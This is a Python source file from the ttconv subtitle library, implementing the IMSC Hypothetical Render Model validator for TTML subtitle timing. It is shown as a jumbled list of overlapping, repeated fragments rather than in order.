"HRM() last_offset = 0 is_last_isd_empty = True for doc_index, (time_offset, isd) in enumerate(isd_iterator):",
"code must retain the above copyright notice, this # list of conditions and",
"signalled through callbacks on the `event_handler`. ''' hrm = HRM() last_offset = 0",
"length 1\") return _GCPY_BASE if ord(char) in GCPY_12 else _GCPY_OTHER def _region_normalized_size(region: typing.Type[ttconv.isd.ISD.Region]):",
"self.isd_stats: ISDStatistics = None def next_isd( self, isd: typing.Type[ttconv.isd.ISD], index_n: int, is_last_isd_empty: bool",
"region.get_style(styles.StyleProperties.ShowBackground) is not styles.ShowBackgroundType.always: return False bg_color: styles.ColorType = region.get_style(styles.StyleProperties.BackgroundColor) if bg_color.ident is",
"are met: # # 1. Redistributions of source code must retain the above",
"occur during processing. Typically overridden by the caller. ''' @staticmethod def _format_message(msg: str,",
"really be included -> yes for now # should br really be included",
"return _GCPY_BASE if ord(char) in GCPY_12 else _GCPY_OTHER def _region_normalized_size(region: typing.Type[ttconv.isd.ISD.Region]): region_extent: styles.ExtentType",
"background_color: styles.ColorType class HRM: def __init__(self): self.back_buffer: typing.Set[_Glyph] = set() self.isd_stats: ISDStatistics =",
"a sequence of tuplets `(begin, ISD)`, where `ISD` is an ISD instance whose",
"dur_t: Number = 0 # HRM text drawing time ngra_t: Number = 0",
"{float(available_time):.3f}s | HRM time: {float(stats.dur):.3f}\\n\" f\" Glyph copy count: {stats.gcpy_count} | render count:",
"and/or other materials provided with the distribution. # # THIS SOFTWARE IS PROVIDED",
"Glyph copy count: {stats.gcpy_count} | render count: {stats.gren_count} | Background draw count: {stats.nbg_total}",
"self.isd_stats.dur_t += nrga / _compute_gcpy(char) self.isd_stats.ngra_t += nrga self.isd_stats.gcpy_count += 1 else: self.isd_stats.dur_t",
"region_extent.width.units is not styles.LengthType.Units.rw: raise RuntimeError(f\"Unsupported extent width units: {region_extent.width.units}\") if region_extent.height.units is",
"self.isd_stats = ISDStatistics() self._compute_dur_t(isd, index_n) self._compute_dur_d(isd, index_n, is_last_isd_empty) self.isd_stats.dur = self.isd_stats.dur_t + self.isd_stats.dur_d",
"nbg_total: Number = 0 # Number of backgrounds drawn clear: bool = False",
"def _region_normalized_size(region: typing.Type[ttconv.isd.ISD.Region]): region_extent: styles.ExtentType = region.get_style(styles.StyleProperties.Extent) if region_extent.width.units is not styles.LengthType.Units.rw: raise",
"Fraction, available_time: Fraction, stats: ISDStatistics): LOGGER.debug(EventHandler._format_message(msg, doc_index, time_offset, available_time, stats)) def validate(isd_iterator: typing.Iterator[typing.Tuple[Fraction,",
"should transparent backgrounds really be counted? -> NO # should span and br",
"the ISD contain any content class EventHandler: '''Allows a callee to inform the",
"draw count: {stats.nbg_total} | Clear: {stats.clear}\\n\" ) def info(self, msg: str, doc_index: int,",
"if region_extent.width.units is not styles.LengthType.Units.rw: raise RuntimeError(f\"Unsupported extent width units: {region_extent.width.units}\") if region_extent.height.units",
"copy count: {stats.gcpy_count} | render count: {stats.gren_count} | Background draw count: {stats.nbg_total} |",
"coding: UTF-8 -*- # Copyright (c) 2021, Pearl TV LLC # # Redistribution",
"THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT # (INCLUDING NEGLIGENCE",
"True if region.get_style(styles.StyleProperties.ShowBackground) is not styles.ShowBackgroundType.always: return False bg_color: styles.ColorType = region.get_style(styles.StyleProperties.BackgroundColor) if",
"permitted provided that the following conditions are met: # # 1. Redistributions of",
"= \"<NAME> <<EMAIL>>\" import typing from dataclasses import dataclass from fractions import Fraction",
"OF SUBSTITUTE GOODS OR SERVICES; # LOSS OF USE, DATA, OR PROFITS; OR",
"of length 1\") return _REN_G_CJK if 0x4E00 <= ord(char) <= 0x9FFF else _REN_G_OTHER",
"set() if isd is not None: for region in isd.iter_regions(): if not _is_presented_region(region):",
"styles.ColorType.Colorimetry.RGBA8: raise RuntimeError(f\"Unsupported colorimetry system: {bg_color.ident}\") if bg_color.components[3] == 0: return False return",
"False if region.get_style(styles.StyleProperties.Visibility) is styles.DisplayType.none: return False if region.has_children(): return True if region.get_style(styles.StyleProperties.ShowBackground)",
"/ _compute_ren_g(char) self.isd_stats.ngra_t += nrga self.isd_stats.gren_count += 1 front_buffer.add(glyph) self.back_buffer = front_buffer def",
"available_time, stats)) def validate(isd_iterator: typing.Iterator[typing.Tuple[Fraction, ttconv.isd.ISD]], event_handler: typing.Type[EventHandler]=EventHandler()): '''Determines whether the sequence of",
"CONTRIBUTORS \"AS IS\" AND # ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT",
"inform the caller of events that occur during processing. Typically overridden by the",
"char: str color : styles.ColorType font_family: typing.Tuple[typing.Union[str, styles.GenericFontFamilyType]] font_size: styles.LengthType font_style: styles.FontStyleType font_weight:",
"def __init__(self): self.back_buffer: typing.Set[_Glyph] = set() self.isd_stats: ISDStatistics = None def next_isd( self,",
"glyph = _Glyph( char=char, color=parent.get_style(styles.StyleProperties.Color), font_family=parent.get_style(styles.StyleProperties.FontFamily), font_size=parent.get_style(styles.StyleProperties.FontSize), font_style=parent.get_style(styles.StyleProperties.FontStyle), font_weight=parent.get_style(styles.StyleProperties.FontWeight), text_decoration=parent.get_style(styles.StyleProperties.TextDecoration), text_outline=parent.get_style(styles.StyleProperties.TextOutline), text_shadow=parent.get_style(styles.StyleProperties.TextShadow), background_color=parent.get_style(styles.StyleProperties.BackgroundColor)",
"_REN_G_OTHER def _compute_gcpy(char: str): if len(char) != 1: raise ValueError(\"Argument must be a",
"count: {stats.nbg_total} | Clear: {stats.clear}\\n\" ) def info(self, msg: str, doc_index: int, time_offset:",
"stats) if not (stats.is_empty and is_last_isd_empty): last_offset = time_offset is_last_isd_empty = stats.is_empty @dataclass(frozen=True)",
"import ttconv.model from ._gcpy_codepoints import GCPY_12 LOGGER = logging.getLogger(__name__) _BDRAW = 12 _GCPY_BASE",
"with or without # modification, are permitted provided that the following conditions are",
"str, doc_index: int, time_offset: Fraction, available_time: Fraction, stats: ISDStatistics): LOGGER.info(EventHandler._format_message(msg, doc_index, time_offset, available_time,",
"of glyphs rendered is_empty: bool = False # Does the ISD contain any",
"index_n == 0 or is_last_isd_empty else 1 self.isd_stats.clear = draw_area != 0 if",
"not _is_presented_region(region): continue for element in region.dfs_iterator(): if not isinstance(element, ttconv.model.Text): continue parent",
"info messages are signalled through callbacks on the `event_handler`. ''' hrm = HRM()",
"bool ) -> ISDStatistics: self.isd_stats = ISDStatistics() self._compute_dur_t(isd, index_n) self._compute_dur_d(isd, index_n, is_last_isd_empty) self.isd_stats.dur",
"= None def next_isd( self, isd: typing.Type[ttconv.isd.ISD], index_n: int, is_last_isd_empty: bool ) ->",
"EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR # ANY DIRECT,",
"Glyph Area gcpy_count: Number = 0 # Total number of glyphs copied gren_count:",
"available_time, stats)) def debug(self, msg: str, doc_index: int, time_offset: Fraction, available_time: Fraction, stats:",
"class ISDStatistics: dur: Number = 0 # HRM ISD time dur_d: Number =",
"_REN_G_CJK if 0x4E00 <= ord(char) <= 0x9FFF else _REN_G_OTHER def _compute_gcpy(char: str): if",
"following conditions are met: # # 1. Redistributions of source code must retain",
"!= 1: raise ValueError(\"Argument must be a string of length 1\") return _REN_G_CJK",
"# # 1. Redistributions of source code must retain the above copyright notice,",
"the `begin` value of the next ISD. Errors, warnings and info messages are",
"_compute_ren_g(char) self.isd_stats.ngra_t += nrga self.isd_stats.gren_count += 1 front_buffer.add(glyph) self.back_buffer = front_buffer def _compute_nrga(element:",
"hrm.next_isd(isd, doc_index, is_last_isd_empty) avail_render_time = _IPD if doc_index == 0 else time_offset -",
"{region_extent.height.units}\") return region_extent.width.value * region_extent.height.value / 10000 def _is_presented_region(region: typing.Type[ttconv.isd.ISD.Region]): '''See https://www.w3.org/TR/ttml-imsc1.1/#dfn-presented-region '''",
"next ISD. Errors, warnings and info messages are signalled through callbacks on the",
"1 draw_area += _region_normalized_size(region) * nbg self.isd_stats.nbg_total += nbg self.isd_stats.dur_d = draw_area /",
"OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS # SOFTWARE,",
"# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND",
"are signalled through callbacks on the `event_handler`. ''' hrm = HRM() last_offset =",
"background_color=parent.get_style(styles.StyleProperties.BackgroundColor) ) if glyph in front_buffer: self.isd_stats.dur_t += nrga / _compute_gcpy(char) self.isd_stats.gcpy_count +=",
"order of increasing offset\") stats = hrm.next_isd(isd, doc_index, is_last_isd_empty) avail_render_time = _IPD if",
"OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND # ON ANY THEORY OF LIABILITY, WHETHER",
"LIMITED TO, THE IMPLIED # WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR",
"isd.iter_regions(): if not _is_presented_region(region): continue self.isd_stats.is_empty = False nbg = 0 for element",
"ValueError(\"Argument must be a string of length 1\") return _GCPY_BASE if ord(char) in",
"COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\" AND # ANY EXPRESS OR IMPLIED WARRANTIES,",
"Redistributions of source code must retain the above copyright notice, this # list",
"__author__ = \"<NAME> <<EMAIL>>\" import typing from dataclasses import dataclass from fractions import",
"self.isd_stats def _compute_dur_d( self, isd: typing.Type[ttconv.isd.ISD], index_n: int, is_last_isd_empty: bool ): self.isd_stats.is_empty =",
"modification, are permitted provided that the following conditions are met: # # 1.",
"ISDStatistics: self.isd_stats = ISDStatistics() self._compute_dur_t(isd, index_n) self._compute_dur_d(isd, index_n, is_last_isd_empty) self.isd_stats.dur = self.isd_stats.dur_t +",
"import typing from dataclasses import dataclass from fractions import Fraction from numbers import",
"self.back_buffer: self.isd_stats.dur_t += nrga / _compute_gcpy(char) self.isd_stats.ngra_t += nrga self.isd_stats.gcpy_count += 1 else:",
"# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; #",
"and ends immediately before the `begin` value of the next ISD. Errors, warnings",
"USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND # ON ANY",
"stats)) def debug(self, msg: str, doc_index: int, time_offset: Fraction, available_time: Fraction, stats: ISDStatistics):",
"nrga / _compute_gcpy(char) self.isd_stats.ngra_t += nrga self.isd_stats.gcpy_count += 1 else: self.isd_stats.dur_t += nrga",
"int, is_last_isd_empty: bool ) -> ISDStatistics: self.isd_stats = ISDStatistics() self._compute_dur_t(isd, index_n) self._compute_dur_d(isd, index_n,",
"msg: str, doc_index: int, time_offset: Fraction, available_time: Fraction, stats: ISDStatistics): LOGGER.error(EventHandler._format_message(msg, doc_index, time_offset,",
"msg: str, doc_index: int, time_offset: Fraction, available_time: Fraction, stats: ISDStatistics): LOGGER.debug(EventHandler._format_message(msg, doc_index, time_offset,",
"class HRM: def __init__(self): self.back_buffer: typing.Set[_Glyph] = set() self.isd_stats: ISDStatistics = None def",
"not styles.LengthType.Units.rh: raise RuntimeError(f\"Unsupported extent height units: {region_extent.height.units}\") return region_extent.width.value * region_extent.height.value /",
"returns a sequence of tuplets `(begin, ISD)`, where `ISD` is an ISD instance",
"text_shadow=parent.get_style(styles.StyleProperties.TextShadow), background_color=parent.get_style(styles.StyleProperties.BackgroundColor) ) if glyph in front_buffer: self.isd_stats.dur_t += nrga / _compute_gcpy(char) self.isd_stats.gcpy_count",
"LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; # LOSS OF USE, DATA,",
"tuplets `(begin, ISD)`, where `ISD` is an ISD instance whose active interval starts",
"{stats.nbg_total} | Clear: {stats.clear}\\n\" ) def info(self, msg: str, doc_index: int, time_offset: Fraction,",
"doc_index, time_offset, available_time, stats)) def validate(isd_iterator: typing.Iterator[typing.Tuple[Fraction, ttconv.isd.ISD]], event_handler: typing.Type[EventHandler]=EventHandler()): '''Determines whether the",
"must be a string of length 1\") return _GCPY_BASE if ord(char) in GCPY_12",
"# HRM text drawing time ngra_t: Number = 0 # Total Normalized Rendered",
"): front_buffer = set() if isd is not None: for region in isd.iter_regions():",
"(HRM)''' __author__ = \"<NAME> <<EMAIL>>\" import typing from dataclasses import dataclass from fractions",
"Number = 0 # Total number of glyphs copied gren_count: Number = 0",
"provided with the distribution. # # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT",
"= _IPD if doc_index == 0 else time_offset - last_offset if stats.dur >",
"'''Determines whether the sequence of ISDs returned by `isd_iterator` conform to the IMSC",
"LOGGER.warning(EventHandler._format_message(msg, doc_index, time_offset, available_time, stats)) def error(self, msg: str, doc_index: int, time_offset: Fraction,",
"container had to be cleared dur_t: Number = 0 # HRM text drawing",
"styles.LengthType.Units.rw: raise RuntimeError(f\"Unsupported extent width units: {region_extent.width.units}\") if region_extent.height.units is not styles.LengthType.Units.rh: raise",
"bg_color.components[3] != 0: nbg += 1 draw_area += _region_normalized_size(region) * nbg self.isd_stats.nbg_total +=",
"_is_presented_region(region: typing.Type[ttconv.isd.ISD.Region]): '''See https://www.w3.org/TR/ttml-imsc1.1/#dfn-presented-region ''' if region.get_style(styles.StyleProperties.Opacity) == 0: return False if region.get_style(styles.StyleProperties.Display)",
"self.isd_stats.clear = draw_area != 0 if isd is not None: for region in",
"Number = 0 # HRM background drawing time nbg_total: Number = 0 #",
"isinstance(element, ttconv.model.Br): continue bg_color = element.get_style(styles.StyleProperties.BackgroundColor) if bg_color is not None: if bg_color.ident",
"is not None: for region in isd.iter_regions(): if not _is_presented_region(region): continue for element",
"reproduce the above copyright notice, # this list of conditions and the following",
"+= 1 elif glyph in self.back_buffer: self.isd_stats.dur_t += nrga / _compute_gcpy(char) self.isd_stats.ngra_t +=",
"available_time: Fraction, stats: ISDStatistics): return ( f\"{msg} at {float(time_offset):.3f}s (doc #{doc_index})\\n\" f\" available",
"{region_extent.width.units}\") if region_extent.height.units is not styles.LengthType.Units.rh: raise RuntimeError(f\"Unsupported extent height units: {region_extent.height.units}\") return",
"int, time_offset: Fraction, available_time: Fraction, stats: ISDStatistics): LOGGER.warning(EventHandler._format_message(msg, doc_index, time_offset, available_time, stats)) def",
"LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT # (INCLUDING NEGLIGENCE OR OTHERWISE)",
"rendered is_empty: bool = False # Does the ISD contain any content class",
"_GCPY_BASE if ord(char) in GCPY_12 else _GCPY_OTHER def _region_normalized_size(region: typing.Type[ttconv.isd.ISD.Region]): region_extent: styles.ExtentType =",
"for char in element.get_text(): glyph = _Glyph( char=char, color=parent.get_style(styles.StyleProperties.Color), font_family=parent.get_style(styles.StyleProperties.FontFamily), font_size=parent.get_style(styles.StyleProperties.FontSize), font_style=parent.get_style(styles.StyleProperties.FontStyle), font_weight=parent.get_style(styles.StyleProperties.FontWeight),",
"be cleared dur_t: Number = 0 # HRM text drawing time ngra_t: Number",
"doc_index: int, time_offset: Fraction, available_time: Fraction, stats: ISDStatistics): LOGGER.info(EventHandler._format_message(msg, doc_index, time_offset, available_time, stats))",
"# ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES # (INCLUDING, BUT",
"# should body elements really be excluded? -> NO # should transparent backgrounds",
"BE LIABLE FOR # ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES",
"f\" available time: {float(available_time):.3f}s | HRM time: {float(stats.dur):.3f}\\n\" f\" Glyph copy count: {stats.gcpy_count}",
"set() self.isd_stats: ISDStatistics = None def next_isd( self, isd: typing.Type[ttconv.isd.ISD], index_n: int, is_last_isd_empty:",
"of length 1\") return _GCPY_BASE if ord(char) in GCPY_12 else _GCPY_OTHER def _region_normalized_size(region:",
"and is_last_isd_empty): last_offset = time_offset is_last_isd_empty = stats.is_empty @dataclass(frozen=True) class _Glyph: char: str",
"stats) if stats.ngra_t > 1: event_handler.error(\"NGBS exceeded\", doc_index, time_offset, avail_render_time, stats) event_handler.debug(\"Processed document\",",
"`event_handler`. ''' hrm = HRM() last_offset = 0 is_last_isd_empty = True for doc_index,",
"width units: {region_extent.width.units}\") if region_extent.height.units is not styles.LengthType.Units.rh: raise RuntimeError(f\"Unsupported extent height units:",
"+= nrga self.isd_stats.gcpy_count += 1 else: self.isd_stats.dur_t += nrga / _compute_ren_g(char) self.isd_stats.ngra_t +=",
"# Total number of glyphs rendered is_empty: bool = False # Does the",
"increasing offset\") stats = hrm.next_isd(isd, doc_index, is_last_isd_empty) avail_render_time = _IPD if doc_index ==",
"br really be included -> yes for now # should br really be",
"during processing. Typically overridden by the caller. ''' @staticmethod def _format_message(msg: str, doc_index:",
"warnings and info messages are signalled through callbacks on the `event_handler`. ''' hrm",
"0 # HRM ISD time dur_d: Number = 0 # HRM background drawing",
"return self.isd_stats def _compute_dur_d( self, isd: typing.Type[ttconv.isd.ISD], index_n: int, is_last_isd_empty: bool ): self.isd_stats.is_empty",
"clear: bool = False # Whether the root container had to be cleared",
"in order of increasing offset\") stats = hrm.next_isd(isd, doc_index, is_last_isd_empty) avail_render_time = _IPD",
"@dataclass(frozen=True) class _Glyph: char: str color : styles.ColorType font_family: typing.Tuple[typing.Union[str, styles.GenericFontFamilyType]] font_size: styles.LengthType",
"Background draw count: {stats.nbg_total} | Clear: {stats.clear}\\n\" ) def info(self, msg: str, doc_index:",
"if bg_color.ident is not styles.ColorType.Colorimetry.RGBA8: raise RuntimeError(f\"Unsupported colorimetry system: {bg_color.ident}\") if bg_color.components[3] !=",
"LOGGER = logging.getLogger(__name__) _BDRAW = 12 _GCPY_BASE = 12 _GCPY_OTHER = 3 _REN_G_CJK",
"time_offset, avail_render_time, stats) if not (stats.is_empty and is_last_isd_empty): last_offset = time_offset is_last_isd_empty =",
"avail_render_time, stats) if not (stats.is_empty and is_last_isd_empty): last_offset = time_offset is_last_isd_empty = stats.is_empty",
"PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\" AND # ANY EXPRESS",
"event_handler.debug(\"Processed document\", doc_index, time_offset, avail_render_time, stats) if not (stats.is_empty and is_last_isd_empty): last_offset =",
"styles.ColorType = region.get_style(styles.StyleProperties.BackgroundColor) if bg_color.ident is not styles.ColorType.Colorimetry.RGBA8: raise RuntimeError(f\"Unsupported colorimetry system: {bg_color.ident}\")",
"or without # modification, are permitted provided that the following conditions are met:",
"= False # Does the ISD contain any content class EventHandler: '''Allows a",
"1 elif glyph in self.back_buffer: self.isd_stats.dur_t += nrga / _compute_gcpy(char) self.isd_stats.ngra_t += nrga",
"-> yes for now # should br really be included -> no if",
"by `isd_iterator` conform to the IMSC HRM. `isd_iterator` returns a sequence of tuplets",
"is_last_isd_empty else 1 self.isd_stats.clear = draw_area != 0 if isd is not None:",
"parent = element.parent() nrga = _compute_nrga(element) for char in element.get_text(): glyph = _Glyph(",
"ISDStatistics): LOGGER.warning(EventHandler._format_message(msg, doc_index, time_offset, available_time, stats)) def error(self, msg: str, doc_index: int, time_offset:",
"bool = False # Whether the root container had to be cleared dur_t:",
"ISDStatistics() self._compute_dur_t(isd, index_n) self._compute_dur_d(isd, index_n, is_last_isd_empty) self.isd_stats.dur = self.isd_stats.dur_t + self.isd_stats.dur_d return self.isd_stats",
"ISDStatistics): LOGGER.info(EventHandler._format_message(msg, doc_index, time_offset, available_time, stats)) def warn(self, msg: str, doc_index: int, time_offset:",
"the caller. ''' @staticmethod def _format_message(msg: str, doc_index: int, time_offset: Fraction, available_time: Fraction,",
"self, isd: typing.Type[ttconv.isd.ISD], _index_n: int ): front_buffer = set() if isd is not",
"Model (HRM)''' __author__ = \"<NAME> <<EMAIL>>\" import typing from dataclasses import dataclass from",
"to the IMSC HRM. `isd_iterator` returns a sequence of tuplets `(begin, ISD)`, where",
"ISD. Errors, warnings and info messages are signalled through callbacks on the `event_handler`.",
"met: # # 1. Redistributions of source code must retain the above copyright",
"OUT OF THE USE OF THIS # SOFTWARE, EVEN IF ADVISED OF THE",
"(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; # LOSS",
"is an ISD instance whose active interval starts at `begin` seconds and ends",
"+= 1 else: self.isd_stats.dur_t += nrga / _compute_ren_g(char) self.isd_stats.ngra_t += nrga self.isd_stats.gren_count +=",
"copyright notice, # this list of conditions and the following disclaimer in the",
"font_weight=parent.get_style(styles.StyleProperties.FontWeight), text_decoration=parent.get_style(styles.StyleProperties.TextDecoration), text_outline=parent.get_style(styles.StyleProperties.TextOutline), text_shadow=parent.get_style(styles.StyleProperties.TextShadow), background_color=parent.get_style(styles.StyleProperties.BackgroundColor) ) if glyph in front_buffer: self.isd_stats.dur_t += nrga",
"raise RuntimeError(f\"Unsupported colorimetry system: {bg_color.ident}\") if bg_color.components[3] != 0: nbg += 1 draw_area",
"1\") return _GCPY_BASE if ord(char) in GCPY_12 else _GCPY_OTHER def _region_normalized_size(region: typing.Type[ttconv.isd.ISD.Region]): region_extent:",
"styles.ShowBackgroundType.always: return False bg_color: styles.ColorType = region.get_style(styles.StyleProperties.BackgroundColor) if bg_color.ident is not styles.ColorType.Colorimetry.RGBA8: raise",
"str): if len(char) != 1: raise ValueError(\"Argument must be a string of length",
"Fraction, available_time: Fraction, stats: ISDStatistics): LOGGER.error(EventHandler._format_message(msg, doc_index, time_offset, available_time, stats)) def debug(self, msg:",
"return ( f\"{msg} at {float(time_offset):.3f}s (doc #{doc_index})\\n\" f\" available time: {float(available_time):.3f}s | HRM",
"raise RuntimeError(f\"Unsupported colorimetry system: {bg_color.ident}\") if bg_color.components[3] == 0: return False return True",
"_GCPY_BASE = 12 _GCPY_OTHER = 3 _REN_G_CJK = 0.6 _REN_G_OTHER = 1.2 _NGBS",
"1. Redistributions of source code must retain the above copyright notice, this #",
"/ _BDRAW def _compute_dur_t( self, isd: typing.Type[ttconv.isd.ISD], _index_n: int ): front_buffer = set()",
"= 3 _REN_G_CJK = 0.6 _REN_G_OTHER = 1.2 _NGBS = 1 _IPD =",
"OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT # (INCLUDING NEGLIGENCE OR",
"processing. Typically overridden by the caller. ''' @staticmethod def _format_message(msg: str, doc_index: int,",
"else _REN_G_OTHER def _compute_gcpy(char: str): if len(char) != 1: raise ValueError(\"Argument must be",
"# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED",
"Number = 0 # HRM ISD time dur_d: Number = 0 # HRM",
"body elements really be excluded? -> NO # should transparent backgrounds really be",
"0: return False if region.get_style(styles.StyleProperties.Display) is styles.DisplayType.none: return False if region.get_style(styles.StyleProperties.Visibility) is styles.DisplayType.none:",
"self.isd_stats.is_empty = False nbg = 0 for element in region.dfs_iterator(): # should body",
"region.get_style(styles.StyleProperties.BackgroundColor) if bg_color.ident is not styles.ColorType.Colorimetry.RGBA8: raise RuntimeError(f\"Unsupported colorimetry system: {bg_color.ident}\") if bg_color.components[3]",
"1 self.isd_stats.clear = draw_area != 0 if isd is not None: for region",
"glyphs copied gren_count: Number = 0 # Total number of glyphs rendered is_empty:",
"-> NO # should span and br really be included -> yes for",
"0 if index_n == 0 or is_last_isd_empty else 1 self.isd_stats.clear = draw_area !=",
"in isd.iter_regions(): if not _is_presented_region(region): continue self.isd_stats.is_empty = False nbg = 0 for",
"included -> yes for now # should br really be included -> no",
"THIS # SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. '''Hypothetical",
"{font_size.units}\") return font_size.value * font_size.value / 10000 def _compute_ren_g(char: str): if len(char) !=",
"extent height units: {region_extent.height.units}\") return region_extent.width.value * region_extent.height.value / 10000 def _is_presented_region(region: typing.Type[ttconv.isd.ISD.Region]):",
"the documentation # and/or other materials provided with the distribution. # # THIS",
"= 1 _IPD = 1 @dataclass class ISDStatistics: dur: Number = 0 #",
"+= nbg self.isd_stats.dur_d = draw_area / _BDRAW def _compute_dur_t( self, isd: typing.Type[ttconv.isd.ISD], _index_n:",
"(stats.is_empty and is_last_isd_empty): last_offset = time_offset is_last_isd_empty = stats.is_empty @dataclass(frozen=True) class _Glyph: char:",
"not None: for region in isd.iter_regions(): if not _is_presented_region(region): continue self.isd_stats.is_empty = False",
"this list of conditions and the following disclaimer in the documentation # and/or",
"of conditions and the following disclaimer in the documentation # and/or other materials",
"be a string of length 1\") return _GCPY_BASE if ord(char) in GCPY_12 else",
"to inform the caller of events that occur during processing. Typically overridden by",
"False # Does the ISD contain any content class EventHandler: '''Allows a callee",
"stats) event_handler.debug(\"Processed document\", doc_index, time_offset, avail_render_time, stats) if not (stats.is_empty and is_last_isd_empty): last_offset",
"a string of length 1\") return _REN_G_CJK if 0x4E00 <= ord(char) <= 0x9FFF",
"import dataclass from fractions import Fraction from numbers import Number import logging import",
"= False nbg = 0 for element in region.dfs_iterator(): # should body elements",
"region.dfs_iterator(): if not isinstance(element, ttconv.model.Text): continue parent = element.parent() nrga = _compute_nrga(element) for",
"the following disclaimer. # 2. Redistributions in binary form must reproduce the above",
"list of conditions and the following disclaimer in the documentation # and/or other",
"is not styles.ColorType.Colorimetry.RGBA8: raise RuntimeError(f\"Unsupported colorimetry system: {bg_color.ident}\") if bg_color.components[3] != 0: nbg",
"HOLDERS AND CONTRIBUTORS \"AS IS\" AND # ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING,",
"available time: {float(available_time):.3f}s | HRM time: {float(stats.dur):.3f}\\n\" f\" Glyph copy count: {stats.gcpy_count} |",
"BUSINESS INTERRUPTION) HOWEVER CAUSED AND # ON ANY THEORY OF LIABILITY, WHETHER IN",
"ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT #",
"== 0 or is_last_isd_empty else 1 self.isd_stats.clear = draw_area != 0 if isd",
"region_extent: styles.ExtentType = region.get_style(styles.StyleProperties.Extent) if region_extent.width.units is not styles.LengthType.Units.rw: raise RuntimeError(f\"Unsupported extent width",
"interval starts at `begin` seconds and ends immediately before the `begin` value of",
"really be counted? -> NO # should span and br really be included",
"and use in source and binary forms, with or without # modification, are",
"last_offset = 0 is_last_isd_empty = True for doc_index, (time_offset, isd) in enumerate(isd_iterator): if",
"FOR A PARTICULAR PURPOSE ARE # DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT",
"font_size.value / 10000 def _compute_ren_g(char: str): if len(char) != 1: raise ValueError(\"Argument must",
"be a string of length 1\") return _REN_G_CJK if 0x4E00 <= ord(char) <=",
"# this list of conditions and the following disclaimer in the documentation #",
"def _compute_ren_g(char: str): if len(char) != 1: raise ValueError(\"Argument must be a string",
"AND # ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR",
"OF THE POSSIBILITY OF SUCH DAMAGE. '''Hypothetical Render Model (HRM)''' __author__ = \"<NAME>",
"time_offset, available_time, stats)) def error(self, msg: str, doc_index: int, time_offset: Fraction, available_time: Fraction,",
"0 # HRM background drawing time nbg_total: Number = 0 # Number of",
"= set() self.isd_stats: ISDStatistics = None def next_isd( self, isd: typing.Type[ttconv.isd.ISD], index_n: int,",
"colorimetry system: {bg_color.ident}\") if bg_color.components[3] != 0: nbg += 1 draw_area += _region_normalized_size(region)",
"ord(char) <= 0x9FFF else _REN_G_OTHER def _compute_gcpy(char: str): if len(char) != 1: raise",
"CONTRACT, STRICT LIABILITY, OR TORT # (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY",
"return _REN_G_CJK if 0x4E00 <= ord(char) <= 0x9FFF else _REN_G_OTHER def _compute_gcpy(char: str):",
"INTERRUPTION) HOWEVER CAUSED AND # ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,",
"stats)) def error(self, msg: str, doc_index: int, time_offset: Fraction, available_time: Fraction, stats: ISDStatistics):",
"._gcpy_codepoints import GCPY_12 LOGGER = logging.getLogger(__name__) _BDRAW = 12 _GCPY_BASE = 12 _GCPY_OTHER",
"Render Model (HRM)''' __author__ = \"<NAME> <<EMAIL>>\" import typing from dataclasses import dataclass",
"styles.ExtentType = region.get_style(styles.StyleProperties.Extent) if region_extent.width.units is not styles.LengthType.Units.rw: raise RuntimeError(f\"Unsupported extent width units:",
"callee to inform the caller of events that occur during processing. Typically overridden",
"conditions are met: # # 1. Redistributions of source code must retain the",
"# Copyright (c) 2021, Pearl TV LLC # # Redistribution and use in",
"units: {font_size.units}\") return font_size.value * font_size.value / 10000 def _compute_ren_g(char: str): if len(char)",
"_compute_dur_t( self, isd: typing.Type[ttconv.isd.ISD], _index_n: int ): front_buffer = set() if isd is",
"INCLUDING, BUT NOT LIMITED TO, THE IMPLIED # WARRANTIES OF MERCHANTABILITY AND FITNESS",
"else _GCPY_OTHER def _region_normalized_size(region: typing.Type[ttconv.isd.ISD.Region]): region_extent: styles.ExtentType = region.get_style(styles.StyleProperties.Extent) if region_extent.width.units is not",
"= 0 # HRM ISD time dur_d: Number = 0 # HRM background",
"(doc #{doc_index})\\n\" f\" available time: {float(available_time):.3f}s | HRM time: {float(stats.dur):.3f}\\n\" f\" Glyph copy",
"1 _IPD = 1 @dataclass class ISDStatistics: dur: Number = 0 # HRM",
"ttconv.model.Br): continue bg_color = element.get_style(styles.StyleProperties.BackgroundColor) if bg_color is not None: if bg_color.ident is",
"+= 1 draw_area += _region_normalized_size(region) * nbg self.isd_stats.nbg_total += nbg self.isd_stats.dur_d = draw_area",
"enumerate(isd_iterator): if time_offset < last_offset: raise RuntimeError(\"ISDs are not in order of increasing",
"time dur_d: Number = 0 # HRM background drawing time nbg_total: Number =",
